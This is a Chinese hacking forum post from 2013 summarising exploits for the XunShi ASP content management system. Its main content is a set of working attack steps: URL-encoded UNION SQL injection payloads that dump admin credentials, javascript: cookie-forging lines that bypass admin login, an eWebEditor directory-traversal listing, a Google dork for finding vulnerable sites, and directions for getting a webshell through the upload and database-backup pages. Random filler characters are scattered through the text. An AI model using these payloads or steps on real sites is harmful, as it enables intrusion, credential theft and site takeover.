找回密码
 立即注册
查看: 3501|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘7 G0 `# [& H6 [1 r
" G% t7 m0 b4 {8 ]
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)7 J5 E' u  j& m; ?+ m9 T7 {

/ J; T" d" ~* t2 m+ L( n以下本文总结来自黑防去年第9期杂志上的内容...
$ M7 `9 ]8 M& _5 _$ m% Z
+ ]/ y* ~1 G. W先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%. q2 i! a' y( Z6 H/ Z- ?
6 x1 a% Z+ S! m# x
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 4 I& G0 a" }3 |5 g+ c: l" ]
2 `2 A" s; \- ?8 R6 J
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况1 w9 f1 d: @$ [5 V
这里一个注入
0 b+ d5 z$ Y8 T! Z  `1 V
0 L2 c/ F5 B/ x" Z$ }效果如图:4 `. B+ Q- s# v$ ?" I: Q
1 Z1 I) G' ^! f+ g0 J$ u* Y9 F

6 O/ p; G$ l/ C( P
& w" e3 T) s2 q2 x5 W这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
9 s- l9 _( i# f1 \1 W0 ~8 l$ A# ]% t5 [6 w
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去5 T: M/ n0 f/ l, N- n) X4 g: p9 G: J
7 q( D3 \  i. V
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));0 d9 _! e. z9 f  M$ b- A" Q* \
' r5 S; n2 ~2 f3 Q, k
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
$ P1 _$ N* n8 T( v1 a- a/ j; L" x
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
  i, |: U, S0 d( }# Z
8 _- z8 h$ R; P  r1 R/ K$ G它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以) |3 A% l3 b8 M/ @9 x

+ H& F" L9 K, {访问这页面来列目录..步骤如下:
  J9 j& C) D( B5 U/ r0 c5 q/ @+ F: ]+ S, S0 E
javascript:alert(document.cookie="admindj=1") : N/ L! P& K& p5 ]* w7 F7 ~! ^
9 y* A4 B( j$ ]$ W- @& W" L
http://www.political-security.co ... asp?id=46&dir=../..
3 O6 W" G, B+ j) M9 G8 Z% P( B9 O
效果如图:0 F9 Q# C6 C( l8 K0 |

1 B5 R. ~7 h9 ~" ^& [% F 1 t. c. f5 Q. g" D
4 [3 @! k7 `$ s: ~& N
这样全站目录都能瞧了..找到后台目录..进去..
8 ?; o. L2 ^3 C& u& `
7 x% @0 u+ K% k7 H, d那么进了后台怎么拿shell??上传--备份就ok了..' \( v# \' g5 |* ^" K6 F% V
5 O* t9 k* }0 W, ~& a, d8 F
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
  }; f" ~  b9 `9 a8 {
% h0 I: M) B4 {- I8 e  G( h: F4 Y这个我也碰到过一次..你都可以通过列目录来实现..' N' f! w( v! z0 J( Z6 d& K' G
2 }' `, D2 i" J
javascript:alert(document.cookie="admindj=1") 6 w8 g  R8 y' ]1 M6 C
7 ^8 _5 J5 v# Z
http://www.political-security.co ... p?action=BackupData
' _# a0 e2 d: O4 O5 Z# t% b; ~% ?/ s* x$ a
备份ok..
: S* \- ?# U. D- F8 i
* H& o5 \, Q0 i# S" t+ }那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
# E( \# \, z3 P# r* ^% S9 ]7 }! i( m
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下4 C1 u" Y5 J( E4 N7 G6 I# K4 {: T: h
0 {- T, M& v! d0 J6 ^
然后访问此页面进行注入..步骤如下:
: F' F; ~( i$ \5 Y
. }: R& }  ~8 R* G5 @* X# M/ b+ sjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
8 ~( F9 j1 o- B9 @% W7 _$ d
3 h7 ?0 t' \5 @" k) l$ d$ p+ d( i然后请求admin/admin_chk.asp页面
' w" t! y6 Q3 R2 I2 P2 b! ?6 n+ [$ E* d7 v4 R1 G3 `5 D' d
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
$ \  N6 e7 y7 N5 g
/ C7 h6 o  e0 w% ?8 M26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin# w* ^1 L8 e* b4 j' C8 G( X

7 v* J8 s: D2 o! Y2 Y3 u! {5 j效果如图所示:
0 _+ i7 @- X; C0 Q4 {  |4 L! K
4 I7 F: U+ M8 T8 X# m5 [ ! s) z7 E! u& }* u

8 A7 Y! B0 q; O1 h! Q; j; n讯时漏洞2
' j1 z) f) S: x. O0 Tgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)1 a/ c# H2 P9 S7 I, u" M

' j9 G- k" ^7 N. q7 o7 M! o% u5 q1、/admin/admin_news_pl_view.asp?id=1* J$ P$ }/ J. D8 V0 r( N! C/ i
//id任意 填入以下语句  F$ e* y! G0 c$ `) Y
& M, A7 U4 F2 D# q9 K
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
- B8 _# I5 J  k8 x
  g( q/ B) v5 |0 W/ U
6 x5 y3 X" F+ Y% F
5 z% B( o" A7 Q: O" N- |* Q9 U3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
/ X2 Q. O3 Q  T( U : C8 k" p9 Y, J! G2 m: v/ w7 Y# o

3 I: \, \4 P& H& l- H- h. y8 j3 f0 S: p- c% Q% X" f
爆出管理员帐号和密码了
# k2 @% p  v( Q ! g' g& `3 w7 j& V. ]  [# W( L$ m
4 Q4 b, y4 C" ]9 S* A

" R4 J# u5 `0 }! k5 ^6 ]' r4、cookies进后台  y' ?* P# s" h
9 T# r& ]7 G  x  Y0 L* B% `4 ]
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));. E5 f' }/ S# L/ y

6 c& w$ F4 `7 R& ?# [' N9 `8 R0 m* z" u8 v% Z3 G, i/ v

- L0 G: k' c, B  W# l3 G6 m# h9 h5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!" V/ H7 a( C8 ^9 J9 P' ^  P# S& p

% S8 g9 f7 C: Z1 n3 i% D, B6 m  O) I1 L8 P

% f/ Z+ d$ T" X6 i1 d/ l# l6、后台有上传和备份取SHELL不难。% l" r( N% H, f+ I2 W+ J% q! e* y
' `5 Y4 N' G% z7 V
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..$ h! i+ F' ]& V) ^* e/ f& D* Y
. f% }& q- B, N- j! Y8 K
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!8 h, k* r0 B1 j/ [0 o, R' e/ P

: h) i* Y0 d8 X; n6 F6 |2 H
7 q# |3 T3 _2 Q( E4 x5 A) \0 d- T! u7 V( s; Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表